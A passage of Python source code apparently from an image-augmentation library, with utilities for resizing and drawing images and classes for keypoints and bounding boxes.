img = ndimage.imread(QUOKKA_FP, mode="RGB")
if size is not None:
img = misc.imresize(img, size)
return img
def quokka_square(size=None):
"""
Returns an (square) image of a quokka as a numpy array.
Parameters
----------
size : None or float or tuple of two ints, optional(default=None)
Size of the output image. Input into scipy.misc.imresize.
Usually expected to be a tuple (H, W), where H is the desired height
and W is the width. If None, then the image will not be resized.
Returns
-------
img : (H,W,3) ndarray
The image array of dtype uint8.
"""
img = ndimage.imread(QUOKKA_FP, mode="RGB")
img = img[0:643, 0:643]
if size is not None:
img = misc.imresize(img, size)
return img
def angle_between_vectors(v1, v2):
"""
Returns the angle in radians between vectors 'v1' and 'v2'.
From http://stackoverflow.com/questions/2827393/angles-between-two-n-dimensional-vectors-in-python
Parameters
----------
{v1, v2} : (N,) ndarray
Input
vectors.
Returns
-------
out : float
Angle in radians.
Examples
--------
>>> angle_between((1, 0, 0), (0, 1, 0))
1.5707963267948966
>>> angle_between((1, 0, 0), (1, 0, 0))
0.0
>>> angle_between((1, 0, 0), (-1, 0, 0))
3.141592653589793
"""
v1_u = v1 / np.linalg.norm(v1)
v2_u = v2 / np.linalg.norm(v2)
return np.arccos(np.clip(np.dot(v1_u, v2_u), -1.0, 1.0))
def draw_text(img, y, x, text, color=[0, 255, 0], size=25): # pylint: disable=locally-disabled, dangerous-default-value, line-too-long
"""
Draw text on an image.
This uses by default DejaVuSans as its font, which is included in the
library.
Parameters
----------
img : (H,W,3) ndarray
The image array to draw text on.
Expected to be of dtype uint8 or float32 (value range 0.0 to 255.0).
{y, x} : int
x- and y- coordinate of the top left corner of the
text.
color : iterable of 3 ints, optional(default=[0, 255, 0])
Color of the text to draw. For RGB-images this is expected to be
an RGB color.
size : int, optional(default=25)
Font size of the text to
draw.
Returns
-------
img_np : (H,W,3) ndarray
Input image with text drawn on it.
"""
# keeping PIL here so that it is not a dependency of the library right now
from PIL import Image, ImageDraw, ImageFont
do_assert(img.dtype in [np.uint8, np.float32])
input_dtype = img.dtype
if img.dtype == np.float32:
img = img.astype(np.uint8)
for i in range(len(color)):
val = color[i]
if isinstance(val, float):
val = int(val * 255)
val = np.clip(val, 0, 255)
color[i] = val
img = Image.fromarray(img)
font = ImageFont.truetype(DEFAULT_FONT_FP, size)
context = ImageDraw.Draw(img)
context.text((x, y), text, fill=tuple(color), font=font)
img_np = np.asarray(img)
img_np.setflags(write=True) # PIL/asarray returns read only array
if img_np.dtype != input_dtype:
img_np = img_np.astype(input_dtype)
return img_np
def imresize_many_images(images, sizes=None, interpolation=None):
"""
Resize many images to a specified size.
Parameters
----------
images : (N,H,W,C) ndarray
Array of the images to resize.
Expected to usually be of dtype uint8.
sizes : iterable of two ints
The new size in (height, width)
format.
interpolation : None or string or int, optional(default=None)
The interpolation to use during resize.
If int, then expected to be one of:
* cv2.INTER_NEAREST (nearest neighbour interpolation)
* cv2.INTER_LINEAR (linear interpolation)
* cv2.INTER_AREA (area interpolation)
* cv2.INTER_CUBIC (cubic interpolation)
If string, then expected to be one of:
* "nearest" (identical to cv2.INTER_NEAREST)
* "linear" (identical to cv2.INTER_LINEAR)
* "area" (identical to cv2.INTER_AREA)
* "cubic" (identical to cv2.INTER_CUBIC)
If None, the interpolation will be chosen automatically. For size
increases, area interpolation will be picked and for size decreases,
linear interpolation will be picked.
Returns
-------
result : (N,H',W',C) ndarray
Array of the resized images.
"""
s = images.shape
do_assert(len(s) == 4, s)
nb_images = s[0]
im_height, im_width = s[1], s[2]
nb_channels = s[3]
height, width = sizes[0], sizes[1]
if height == im_height and width == im_width:
return np.copy(images)
ip = interpolation
do_assert(ip is None or ip in ["nearest", "linear", "area", "cubic", cv2.INTER_NEAREST, cv2.INTER_LINEAR, cv2.INTER_AREA, cv2.INTER_CUBIC])
if ip is None:
if height > im_height or width > im_width:
ip = cv2.INTER_AREA
else:
ip = cv2.INTER_LINEAR
elif ip in ["nearest", cv2.INTER_NEAREST]:
ip = cv2.INTER_NEAREST
elif ip in ["linear", cv2.INTER_LINEAR]:
ip = cv2.INTER_LINEAR
elif ip in ["area", cv2.INTER_AREA]:
ip = cv2.INTER_AREA
elif ip in ["cubic", cv2.INTER_CUBIC]:
ip = cv2.INTER_CUBIC
else:
raise Exception("Invalid interpolation order")
result = np.zeros((nb_images, height, width, nb_channels), dtype=np.uint8)
for img_idx in sm.xrange(nb_images):
# TODO fallback to scipy here if image isn't uint8
result_img = cv2.resize(images[img_idx], (width, height), interpolation=ip)
if len(result_img.shape) == 2:
result_img = result_img[:, :, np.newaxis]
result[img_idx] = result_img
return result
def imresize_single_image(image, sizes, interpolation=None):
"""
Resizes a single image.
Parameters
----------
image : (H,W,C) ndarray or (H,W) ndarray
Array of the image to resize.
Expected to usually be of dtype uint8.
sizes : iterable of two ints
See `imresize_many_images()`.
interpolation : None or string or int, optional(default=None)
See `imresize_many_images()`.
Returns
-------
out : (H',W',C) ndarray or (H',W') ndarray
The resized image.
"""
grayscale = False
if image.ndim == 2:
grayscale = True
image = image[:, :, np.newaxis]
do_assert(len(image.shape) == 3, image.shape)
rs = imresize_many_images(image[np.newaxis, :, :, :], sizes, interpolation=interpolation)
if grayscale:
return np.squeeze(rs[0, :, :, 0])
else:
return rs[0, ...]
def draw_grid(images, rows=None, cols=None):
"""
Converts multiple input images into a single image showing them in a grid.
Parameters
----------
images : (N,H,W,3) ndarray or iterable of (H,W,3) array
The input images to convert to a grid.
Expected to be RGB and have dtype uint8.
rows : None or int, optional(default=None)
The number of rows to show in the grid.
If None, it will be automatically derived.
cols : None or int, optional(default=None)
The number of cols to show in the grid.
If None, it will be automatically derived.
Returns
-------
grid : (H',W',3) ndarray
Image of the generated grid.
"""
if is_np_array(images):
do_assert(images.ndim == 4)
else:
do_assert(is_iterable(images) and is_np_array(images[0]) and images[0].ndim == 3)
nb_images = len(images)
do_assert(nb_images > 0)
cell_height = max([image.shape[0] for image in images])
cell_width = max([image.shape[1] for image in images])
channels = set([image.shape[2] for image in images])
do_assert(len(channels) == 1, "All images are expected to have the same number of channels, but got channel set %s with length %d instead." % (str(channels), len(channels)))
nb_channels = list(channels)[0]
if rows is None and cols is None:
rows = cols = int(math.ceil(math.sqrt(nb_images)))
elif rows is not None:
cols = int(math.ceil(nb_images / rows))
elif cols is not None:
rows = int(math.ceil(nb_images / cols))
do_assert(rows * cols >= nb_images)
width = cell_width * cols
height = cell_height * rows
grid = np.zeros((height, width, nb_channels), dtype=np.uint8)
cell_idx = 0
for row_idx in sm.xrange(rows):
for col_idx in sm.xrange(cols):
if cell_idx < nb_images:
image = images[cell_idx]
cell_y1 = cell_height * row_idx
cell_y2 = cell_y1 + image.shape[0]
cell_x1 = cell_width * col_idx
cell_x2 = cell_x1 + image.shape[1]
grid[cell_y1:cell_y2, cell_x1:cell_x2, :] = image
cell_idx += 1
return grid
def show_grid(images, rows=None, cols=None):
"""
Converts the input images to a grid image and shows it in a new window.
This function wraps around scipy.misc.imshow(), which requires the
`see <image>` command to work. On Windows systems, this tends to not be
the case.
Parameters
----------
images : (N,H,W,3) ndarray or iterable of (H,W,3) array
See `draw_grid()`.
rows : None or int, optional(default=None)
See `draw_grid()`.
cols : None or int, optional(default=None)
See `draw_grid()`.
"""
grid = draw_grid(images, rows=rows, cols=cols)
misc.imshow(grid)
def do_assert(condition, message="Assertion failed."):
"""
Function that behaves equally to an `assert` statement, but raises an
Exception.
This is added because `assert` statements are removed in optimized code.
It replaces `assert` statements throughout the library that should be
kept even in optimized code.
Parameters
----------
condition : bool
If False, an exception is raised.
message : string, optional(default="Assertion failed.")
Error message.
"""
if not condition:
raise AssertionError(str(message))
class HooksImages(object):
"""
Class to intervene with image augmentation runs.
This is e.g. useful to dynamically deactivate some augmenters.
Parameters
----------
activator : None or callable, optional(default=None)
A function that gives permission to execute an augmenter.
The expected interface is
`f(images, augmenter, parents, default)`,
where `images` are the input images to augment, `augmenter` is the
instance of the augmenter to execute, `parents` are previously
executed augmenters and `default` is an expected default value to be
returned if the activator function does not plan to make a decision
for the given inputs.
propagator : None or callable, optional(default=None)
A function that gives permission to propagate the augmentation further
to the children of an augmenter. This happens after the activator.
In theory, an augmenter may augment images itself (if allowed by the
activator) and then execute child augmenters afterwards (if allowed by
the propagator). If the activator returned False, the propagation step
will never be executed.
The expected interface is
`f(images, augmenter, parents, default)`,
with all arguments having identical meaning to the activator.
preprocessor : None or callable, optional(default=None)
A function to call before an augmenter performed any augmentations.
The interface is
`f(images, augmenter, parents)`,
with all arguments having identical meaning to the activator.
It is expected to return the input images, optionally modified.
postprocessor : None or callable, optional(default=None)
A function to call after an augmenter performed augmentations.
The interface is the same as for the preprocessor.
Examples
--------
>>> seq = iaa.Sequential([
>>> iaa.GaussianBlur(3.0, name="blur"),
>>> iaa.Dropout(0.05, name="dropout"),
>>> iaa.Affine(translate_px=-5, name="affine")
>>> ])
>>>
>>> def activator(images, augmenter, parents, default):
>>> return False if augmenter.name in ["blur", "dropout"] else default
>>>
>>> seq_det = seq.to_deterministic()
>>> images_aug = seq_det.augment_images(images)
>>> heatmaps_aug = seq_det.augment_images(
>>> heatmaps,
>>> hooks=ia.HooksImages(activator=activator)
>>> )
This augments images and their respective heatmaps in the same way.
The heatmaps however are only modified by Affine, not by GaussianBlur or
Dropout.
"""
def __init__(self, activator=None, propagator=None, preprocessor=None, postprocessor=None):
self.activator = activator
self.propagator = propagator
self.preprocessor = preprocessor
self.postprocessor = postprocessor
def is_activated(self, images, augmenter, parents, default):
"""
Returns whether an augmenter may be executed.
Returns
-------
out : bool
If True, the augmenter may be executed. If False, it may
not be executed.
"""
if self.activator is None:
return default
else:
return self.activator(images, augmenter, parents, default)
# TODO is a propagating hook necessary? seems to be covered by activated
# hook already
def is_propagating(self, images, augmenter, parents, default):
"""
Returns whether an augmenter may call its children to augment an
image. This is independent of the augmenter itself possible changing
the image, without calling its children. (Most (all?) augmenters with
children currently dont perform any changes themselves.)
Returns
-------
out : bool
If True, the augmenter may be propagate to its children.
If False, it may not.
"""
if self.propagator is None:
return default
else:
return self.propagator(images, augmenter, parents, default)
def preprocess(self, images, augmenter, parents):
"""
A function to be called before the augmentation of images starts (per
augmenter).
Returns
-------
out : (N,H,W,C) ndarray or (N,H,W) ndarray or list of (H,W,C) ndarray or list of (H,W) ndarray
The input images, optionally modified.
"""
if self.preprocessor is None:
return images
else:
return self.preprocessor(images, augmenter, parents)
def postprocess(self, images, augmenter, parents):
"""
A function to be called after the augmentation of images was
performed.
Returns
-------
out : (N,H,W,C) ndarray or (N,H,W) ndarray or list of (H,W,C) ndarray or list of (H,W) ndarray
The input images, optionally modified.
"""
if self.postprocessor is None:
return images
else:
return self.postprocessor(images, augmenter, parents)
class HooksKeypoints(HooksImages):
"""
Class to intervene with keypoint augmentation runs.
This is e.g. useful to dynamically deactivate some augmenters.
This class is currently the same as the one for images. This may or may
not change in the future.
"""
pass
class Keypoint(object):
"""
A single keypoint (aka landmark) on an image.
Parameters
----------
x : number
Coordinate of the keypoint on the x axis.
y : number
Coordinate of the keypoint on the y axis.
"""
def __init__(self, x, y):
# these checks are currently removed because they are very slow for some
# reason
#assert is_single_integer(x), type(x)
#assert is_single_integer(y), type(y)
self.x = x
self.y = y
@property
def x_int(self):
return int(round(self.x))
@property
def y_int(self):
return int(round(self.y))
def project(self, from_shape, to_shape):
"""
Project the keypoint onto a new position on a new image.
E.g. if the keypoint is on its original image at x=(10 of 100 pixels)
and y=(20 of 100 pixels) and is projected onto a new image with
size (width=200, height=200), its new position will be (20, 40).
This is intended for cases where the original image is resized.
It cannot be used for more complex changes (e.g. padding, cropping).
Parameters
----------
from_shape : tuple
Shape of the original image. (Before resize.)
to_shape : tuple
Shape of the new image. (After resize.)
Returns
-------
out : Keypoint
Keypoint object with new coordinates.
"""
if from_shape[0:2] == to_shape[0:2]:
return Keypoint(x=self.x, y=self.y)
else:
from_height, from_width = from_shape[0:2]
to_height, to_width = to_shape[0:2]
x = (self.x / from_width) * to_width
y = (self.y / from_height) * to_height
return Keypoint(x=x, y=y)
def shift(self, x, y):
"""
Move the keypoint around on an image.
Parameters
----------
x : number
Move by this value on the x axis.
y : number
Move by this value on the y axis.
Returns
-------
out : Keypoint
Keypoint object with new coordinates.
"""
return Keypoint(self.x + x, self.y + y)
def __repr__(self):
return self.__str__()
def __str__(self):
return "Keypoint(x=%.8f, y=%.8f)" % (self.x, self.y)
class KeypointsOnImage(object):
"""
Object that represents all keypoints on a single image.
Parameters
----------
keypoints : list of Keypoint
List of keypoints on the image.
shape : tuple of int
The shape of the image on which the keypoints are placed.
Examples
--------
>>> kps = [Keypoint(x=10, y=20), Keypoint(x=34, y=60)]
>>> kps_oi = KeypointsOnImage(kps, shape=image.shape)
"""
def __init__(self, keypoints, shape):
#assert len(shape) == 3, "KeypointsOnImage requires shape tuples of form (H, W, C) but got %s. Use C=1 for 2-dimensional images." % (str(shape),)
self.keypoints = keypoints
if is_np_array(shape):
self.shape = shape.shape
else:
do_assert(isinstance(shape, (tuple, list)))
self.shape = tuple(shape)
@property
def height(self):
return self.shape[0]
@property
def width(self):
return self.shape[1]
def on(self, image):
"""
Project keypoints from one image to a new one.
Parameters
----------
image : ndarray or tuple
New image onto which the keypoints are to be projected.
May also simply be that new image's shape tuple.
Returns
-------
keypoints : KeypointsOnImage
Object containing all projected keypoints.
"""
if is_np_array(image):
shape = image.shape
else:
shape = image
if shape[0:2] == self.shape[0:2]:
return self.deepcopy()
else:
keypoints = [kp.project(self.shape, shape) for kp in self.keypoints]
return KeypointsOnImage(keypoints, shape)
def draw_on_image(self, image, color=[0, 255, 0], size=3, copy=True, raise_if_out_of_image=False): # pylint: disable=locally-disabled, dangerous-default-value, line-too-long
"""
Draw all keypoints onto a given image. Each keypoint is marked by a
square of a chosen color and size.
Parameters
----------
image : (H,W,3) ndarray
The image onto which to draw the keypoints.
This image should usually have the same shape as
set in KeypointsOnImage.shape.
color : int or list of ints or tuple of ints or (3,) ndarray, optional(default=[0, 255, 0])
The RGB color of all keypoints. If a single int `C`, then that is
equivalent to (C,C,C).
size : int, optional(default=3)
The size of each point. If set to C, each square will have
size CxC.
copy : bool, optional(default=True)
Whether to copy the image before drawing the points.
raise_if_out_of_image : bool, optional(default=False)
Whether to raise an exception if any keypoint is outside of the
image.
Returns
-------
image : (H,W,3) ndarray
Image with drawn keypoints.
"""
if copy:
image = np.copy(image)
height, width = image.shape[0:2]
for keypoint in self.keypoints:
y, x = keypoint.y_int, keypoint.x_int
if 0 <= y < height and 0 <= x < width:
x1 = max(x - size//2, 0)
x2 = min(x + 1 + size//2, width - 1)
y1 = max(y - size//2, 0)
y2 = min(y + 1 + size//2, height - 1)
image[y1:y2, x1:x2] = color
else:
if raise_if_out_of_image:
raise Exception("Cannot draw keypoint x=%.8f, y=%.8f on image with shape %s." % (y, x, image.shape))
return image
def shift(self, x, y):
"""
Move the keypoints around on an image.
Parameters
----------
x : number
Move each keypoint by this value on the x axis.
y : number
Move each keypoint by this value on the y axis.
Returns
-------
out : KeypointsOnImage
Keypoints after moving them.
"""
keypoints = [keypoint.shift(x=x, y=y) for keypoint in self.keypoints]
return KeypointsOnImage(keypoints, self.shape)
def get_coords_array(self):
"""
Convert the coordinates of all keypoints in this object to
an array of shape (N,2).
Returns
-------
result : (N, 2) ndarray
Where N is the number of keypoints. Each first value is the
x coordinate, each second value is the y coordinate.
"""
result = np.zeros((len(self.keypoints), 2), np.float32)
for i, keypoint in enumerate(self.keypoints):
result[i, 0] = keypoint.x
result[i, 1] = keypoint.y
return result
@staticmethod
def from_coords_array(coords, shape):
"""
Convert an array (N,2) with a given image shape to a KeypointsOnImage
object.
Parameters
----------
coords : (N, 2) ndarray
Coordinates of N keypoints on the original image.
Each first entry (i, 0) is expected to be the x coordinate.
Each second entry (i, 1) is expected to be the y coordinate.
shape : tuple
Shape tuple of the image on which the keypoints are placed.
Returns
-------
out : KeypointsOnImage
KeypointsOnImage object that contains all keypoints from the array.
"""
keypoints = [Keypoint(x=coords[i, 0], y=coords[i, 1]) for i in sm.xrange(coords.shape[0])]
return KeypointsOnImage(keypoints, shape)
def to_keypoint_image(self, size=1):
"""
Draws a new black image of shape (H,W,N) in which all keypoint coordinates
are set to 255.
(H=shape height, W=shape width, N=number of keypoints)
This function can be used as a helper when augmenting keypoints with
a method that only supports the augmentation of images.
Parameters
-------
size : int
Size of each (squared) point.
Returns
-------
image : (H,W,N) ndarray
Image in which the keypoints are marked. H is the height,
defined in KeypointsOnImage.shape[0] (analogous W). N is the
number of keypoints.
"""
do_assert(len(self.keypoints) > 0)
height, width = self.shape[0:2]
image = np.zeros((height, width, len(self.keypoints)), dtype=np.uint8)
do_assert(size % 2 != 0)
sizeh = max(0, (size-1)//2)
for i, keypoint in enumerate(self.keypoints):
# TODO for float values spread activation over several cells
# here and do voting at the end
y = keypoint.y_int
x = keypoint.x_int
x1 = np.clip(x - sizeh, 0, width-1)
x2 = np.clip(x + sizeh + 1, 0, width-1)
y1 = np.clip(y - sizeh, 0, height-1)
y2 = np.clip(y + sizeh + 1, 0, height-1)
#if 0 <= y < height and 0 <= x < width:
# image[y, x, i] = 255
if x1 < x2 and y1 < y2:
image[y1:y2, x1:x2, i] = 128
if 0 <= y < height and 0 <= x < width:
image[y, x, i] = 255
return image
@staticmethod
def from_keypoint_image(image, if_not_found_coords={"x": -1, "y": -1}, threshold=1, nb_channels=None): # pylint: disable=locally-disabled, dangerous-default-value, line-too-long
"""
Converts an image generated by `to_keypoint_image()` back to
an KeypointsOnImage object.
Parameters
----------
image : (H,W,N) ndarray
The keypoints image. N is the number of
keypoints.
if_not_found_coords : tuple or list or dict or None
Coordinates to use for keypoints that cannot be found in `image`.
If this is a list/tuple, it must have two integer values. If it
is a dictionary, it must have the keys "x" and "y". If this
is None, then the keypoint will not be added to the final
KeypointsOnImage object.
threshold : int
The search for keypoints works by searching for the argmax in
each channel. This parameters contains the minimum value that
the max must have in order to be viewed as a keypoint.
nb_channels : None or int
Number of channels of the image on which the keypoints are placed.
Some keypoint augmenters require that information.
If set to None, the keypoint's shape will be set
to `(height, width)`, otherwise `(height, width, nb_channels)`.
Returns
-------
out : KeypointsOnImage
The extracted keypoints.
"""
do_assert(len(image.shape) == 3)
height, width, nb_keypoints = image.shape
drop_if_not_found = False
if if_not_found_coords is None:
drop_if_not_found = True
if_not_found_x = -1
if_not_found_y = -1
elif isinstance(if_not_found_coords, (tuple, list)):
do_assert(len(if_not_found_coords) == 2)
if_not_found_x = if_not_found_coords[0]
if_not_found_y = if_not_found_coords[1]
elif isinstance(if_not_found_coords, dict):
if_not_found_x = if_not_found_coords["x"]
if_not_found_y = if_not_found_coords["y"]
else:
raise Exception("Expected if_not_found_coords to be None or tuple or list or dict, got %s." % (type(if_not_found_coords),))
keypoints = []
for i in sm.xrange(nb_keypoints):
maxidx_flat = np.argmax(image[..., i])
maxidx_ndim = np.unravel_index(maxidx_flat, (height, width))
found = (image[maxidx_ndim[0], maxidx_ndim[1], i] >= threshold)
if found:
keypoints.append(Keypoint(x=maxidx_ndim[1], y=maxidx_ndim[0]))
else:
if drop_if_not_found:
pass # dont add the keypoint to the result list, i.e. drop it
else:
keypoints.append(Keypoint(x=if_not_found_x, y=if_not_found_y))
out_shape = (height, width)
if nb_channels is not None:
out_shape += (nb_channels,)
return KeypointsOnImage(keypoints, shape=out_shape)
def copy(self):
"""
Create a shallow copy of the KeypointsOnImage object.
Returns
-------
out : KeypointsOnImage
Shallow copy.
"""
return copy.copy(self)
def deepcopy(self):
"""
Create a deep copy of the KeypointsOnImage object.
Returns
-------
out : KeypointsOnImage
Deep copy.
"""
# for some reason deepcopy is way slower here than manual copy
#return copy.deepcopy(self)
kps = [Keypoint(x=kp.x, y=kp.y) for kp in self.keypoints]
return KeypointsOnImage(kps, tuple(self.shape))
def __repr__(self):
return self.__str__()
def __str__(self):
return "KeypointsOnImage(%s, shape=%s)" % (str(self.keypoints), self.shape)
# TODO functions: square(), to_aspect_ratio(), extend()/add_border(), contains_point()
class BoundingBox(object):
def __init__(self, x1, y1, x2, y2):
if x1 > x2:
x2, x1 = x1, x2
do_assert(x2 > x1)
if y1 > y2:
y2, y1 = y1, y2
do_assert(y2 > y1)
self.x1 = x1
self.y1 = y1
self.x2 = x2
self.y2 = y2
@property
def x1_int(self):
return int(round(self.x1))
@property
def y1_int(self):
return int(round(self.y1))
@property
def x2_int(self):
return int(round(self.x2))
@property
def y2_int(self):
return int(round(self.y2))
@property
def height(self):
return self.y2 - self.y1
@property
def width(self):
return self.x2 - self.x1
@property
def center_x(self):
return self.x1 + self.width/2
@property
def center_y(self):
return self.y1 + self.height/2
@property
def area(self):
return self.height * self.width
def project(self, from_shape, to_shape):
"""
Project the bounding box onto a new position on a new image.
E.g. if the bounding box is on its original image at
x1=(10 of 100 pixels) and y1=(20 of 100 pixels) and is projected onto
a new image with size (width=200, height=200), its new position will
be (x1=20, y1=40). (Analogous for x2/y2.)
This is intended for cases where the original image is resized.
It cannot be used for more complex changes (e.g. padding, cropping).
Parameters
----------
from_shape : tuple
Shape of the original image. (Before resize.)
to_shape : tuple
Shape of the new image. (After resize.)
Returns
-------
out : BoundingBox
BoundingBox object with new coordinates.
"""
if from_shape[0:2] == to_shape[0:2]:
return self.copy()
else:
from_height, from_width = from_shape[0:2]
to_height, to_width = to_shape[0:2]
do_assert(from_height > 0)
do_assert(from_width > 0)
do_assert(to_height > 0)
do_assert(to_width > 0)
x1 = (self.x1 / from_width) * to_width
y1 = (self.y1 / from_height) * to_height
x2 = (self.x2 / from_width) * to_width
y2 = (self.y2 / from_height) * to_height
if x1 == x2:
if x1 == 0:
x2 += 1
else:
x1 -= 1
if y1 == y2:
if y1 == 0:
y2 += 1
else:
y1 -= 1
return self.copy(
x1=x1,
y1=y1,
x2=x2,
y2=y2
)
def extend(self, all_sides=0, top=0, right=0, bottom=0, left=0):
return BoundingBox(
x1=self.x1 - all_sides - left,
x2=self.x2 + all_sides + right,
y1=self.y1 - all_sides - top,
y2=self.y2 + all_sides + bottom
)
def intersection(self, other, default=None):
x1_i = max(self.x1, other.x1)
y1_i = max(self.y1, other.y1)
x2_i = min(self.x2, other.x2)
y2_i = min(self.y2, other.y2)
if x1_i >= x2_i or y1_i >= y2_i:
return default
else:
return BoundingBox(x1=x1_i, y1=y1_i, x2=x2_i, y2=y2_i)
def union(self, other):
return BoundingBox(
x1=min(self.x1, other.x1),
y1=min(self.y1, other.y1),
x2=max(self.x2, other.x2),
y2=max(self.y2, other.y2)
)
def iou(self, other):
inters = self.intersection(other)
if inters is None:
return 0
else:
return inters.area / self.union(other).area
def is_fully_within_image(self, image):
if isinstance(image, tuple):
shape = image
else:
shape = image.shape
height, width = shape[0:2]
return self.x1 >= 0 and self.x2 <= width and self.y1 >= 0 and self.y2 <= height
def is_partly_within_image(self, image):
if isinstance(image, tuple):
shape = image
else:
shape = image.shape
height, width = shape[0:2]
img_bb = BoundingBox(x1=0, x2=width, y1=0, y2=height)
return self.intersection(img_bb) is not None
def is_out_of_image(self, image, fully=True, partly=False):
if self.is_fully_within_image(image):
return False
elif self.is_partly_within_image(image):
return partly
else:
return fully
def cut_out_of_image(self, image):
if isinstance(image, tuple):
shape = image
else:
shape = image.shape
height, width = shape[0:2]
do_assert(height > 0)
do_assert(width > 0)
x1 = np.clip(self.x1, 0, width)
x2 = np.clip(self.x2, 0, width)
y1 = np.clip(self.y1, 0, height)
y2 = np.clip(self.y2, 0, height)
if x1 == x2:
if x1 == 0:
x2 += 1
else:
x1 -= 1
if y1 == y2:
if y1 == 0:
y2 += 1
else:
y1 -= 1
return self.copy(
x1=x1,
y1=y1,
x2=x2,
y2=y2
)
def shift(self, top=None, right=None, bottom=None, left=None):
top = top if top is not None else 0
right = right if right is not None else 0
bottom = bottom if bottom is not None else 0
left = left if left is not None else 0
return self.copy(
x1=self.x1+left-right,
x2=self.x2+left-right,
y1=self.y1+top-bottom,
y2=self.y2+top-bottom
)
def draw_on_image(self, image, color=[0, 255, 0], alpha=1.0, thickness=1, copy=True, raise_if_out_of_image=False): # pylint: disable=locally-disabled, dangerous-default-value, line-too-long
if raise_if_out_of_image and self.is_out_of_image(image):
raise Exception("Cannot draw bounding box x1=%.8f, y1=%.8f, x2=%.8f, y2=%.8f on image with shape %s." % (self.x1, self.y1, self.x2, self.y2, image.shape))
result = np.copy(image) if copy else image
for i in range(thickness):
y = [self.y1_int-i, self.y1_int-i, self.y2_int+i, self.y2_int+i]
x = [self.x1_int-i, self.x2_int+i, self.x2_int+i, self.x1_int-i]
rr, cc = draw.polygon_perimeter(y, x, shape=result.shape)
if alpha >= 0.99:
result[rr, cc, 0] = color[0]
result[rr, cc, 1] = color[1]
result[rr, cc, 2] = color[2]
else:
if result.dtype in [np.float32, np.float64]:
result[rr, cc, 0] = (1 - alpha) * result[rr, cc, 0] + alpha * color[0]
result[rr, cc, 1] = (1 - alpha) * result[rr, cc, 1] + alpha * color[1]
result[rr, cc, 2] = (1 - alpha) * result[rr, cc, 2] + alpha * color[2]
result = np.clip(result, 0, 255)
else:
input_dtype = result.dtype
result = result.astype(np.float32)
result[rr, cc, 0] = (1 - alpha) * result[rr, cc, 0] + alpha * color[0]
result[rr, cc, 1] = (1 - alpha) * result[rr, cc, 1] + alpha * color[1]
result[rr, cc, 2] = (1 - alpha) * result[rr, cc, 2] + alpha * color[2]
result = np.clip(result, 0, 255).astype(input_dtype)
return result
def extract_from_image(self, image):
pad_top = 0
pad_right = 0
pad_bottom = 0
pad_left = 0
height, width = image.shape[0], image.shape[1]
x1, x2, y1, y2 = self.x1_int, self.x2_int, self.y1_int, self.y2_int
# if the bb is outside of the image area, the following pads the image
# first with black pixels until the bb is inside the image
# and only then extracts the image area
# TODO probably more efficient to initialize an array of zeros
# and copy only the portions of the bb into that array that are
# natively inside the image area
if x1 < 0:
pad_left = abs(x1)
x2 = x2 + abs(x1)
x1 = 0
if y1 < 0:
pad_top = abs(y1)
y2 = y2 + abs(y1)
y1 = 0
if x2 >= width:
pad_right = x2 - (width - 1)
if y2 >= height:
pad_bottom = y2 - (height - 1)
if any([val > 0 for val in [pad_top, pad_right, pad_bottom, pad_left]]):
if len(image.shape) == 2:
image = np.pad(image, ((pad_top, pad_bottom), (pad_left, pad_right)), mode="constant")
else:
image = np.pad(image, ((pad_top, pad_bottom), (pad_left, pad_right), (0, 0)), mode="constant")
return image[y1:y2, x1:x2]
def to_keypoints(self):
return [
Keypoint(x=self.x1, y=self.y1),
Keypoint(x=self.x2, y=self.y1),
Keypoint(x=self.x2, y=self.y2),
Keypoint(x=self.x1, y=self.y2)
]
def copy(self, x1=None, y1=None, x2=None, y2=None):
return BoundingBox(
x1=self.x1 if x1 is None else x1,
x2=self.x2 if x2 is None else x2,
y1=self.y1 if y1 is None else y1,
y2=self.y2 if y2 is None else y2
)
def deepcopy(self, x1=None, y1=None, x2=None, y2=None):
return self.copy(x1=x1, y1=y1, x2=x2, y2=y2)
def __repr__(self):
return self.__str__()
def __str__(self):
return "BoundingBox(x1=%.4f, y1=%.4f, x2=%.4f, y2=%.4f)" % (self.x1, self.y1, self.x2, self.y2)
class BoundingBoxesOnImage(object):
"""
Object that represents all bounding boxes on a single image.
Parameters
----------
bounding_boxes : list of BoundingBox
List of bounding boxes on the image.
shape : tuple of int
The shape of the image on which the bounding boxes are placed.
Examples
--------
>>> bbs = [
>>> BoundingBox(x1=10, y1=20, x2=20, y2=30),
>>> BoundingBox(x1=25, y1=50, x2=30, y2=70)
>>> ]
>>> bbs_oi = BoundingBoxesOnImage(bbs, shape=image.shape)
"""
def __init__(self, bounding_boxes, shape):
self.bounding_boxes = bounding_boxes
if is_np_array(shape):
self.shape = shape.shape
else:
do_assert(isinstance(shape, (tuple, list)))
self.shape = tuple(shape)
@property
def height(self):
return self.shape[0]
@property
def width(self):
return self.shape[1]
def on(self, image):
"""
Project bounding boxes from one image to a new one.
Parameters
----------
image : ndarray or tuple
New image onto which the bounding boxes are to be projected.
May also simply be that new image's shape tuple.
Returns
-------
keypoints : BoundingBoxesOnImage
Object containing all projected bounding boxes.
"""
if is_np_array(image):
shape = image.shape
else:
shape = image
if shape[0:2] == self.shape[0:2]:
return self.deepcopy()
else:
bounding_boxes = [bb.project(self.shape, shape) for bb in self.bounding_boxes]
return BoundingBoxesOnImage(bounding_boxes, shape)
def draw_on_image(self, image, color=[0, 255, 0], alpha=1.0, thickness=1, copy=True, raise_if_out_of_image=False):
"""
Draw all bounding boxes onto a given image.
Parameters
----------
image : (H,W,3) ndarray
The image onto which to draw the bounding boxes.
This image should usually have the same shape as
set in BoundingBoxesOnImage.shape.
color : int or list of ints or tuple of ints or (3,) ndarray, optional(default=[0, 255, 0])
The RGB color of all bounding boxes. If a single int `C`, then that is
equivalent to (C,C,C).
size : float, optional(default=1.0)
Alpha/transparency of the bounding box.
thickness : int, optional(default=1)
Thickness in pixels.
copy : bool, optional(default=True)
Whether to copy the image before drawing the points.
raise_if_out_of_image : bool, optional(default=False)
Whether to raise an exception if any bounding box is outside of the
image.
Returns
-------
image : (H,W,3) ndarray
Image with drawn bounding boxes.
"""
for bb in self.bounding_boxes:
image = bb.draw_on_image(
image,
color=color,
alpha=alpha,
thickness=thickness,
copy=copy,
raise_if_out_of_image=raise_if_out_of_image
)
return image
def remove_out_of_image(self, fully=True, partly=False):
bbs_clean = [bb for bb in self.bounding_boxes if not bb.is_out_of_image(self.shape, fully=fully, partly=partly)]
return BoundingBoxesOnImage(bbs_clean, shape=self.shape)
def cut_out_of_image(self):
bbs_cut = [bb.cut_out_of_image(self.shape) for bb in self.bounding_boxes if bb.is_partly_within_image(self.shape)]
return BoundingBoxesOnImage(bbs_cut, shape=self.shape)
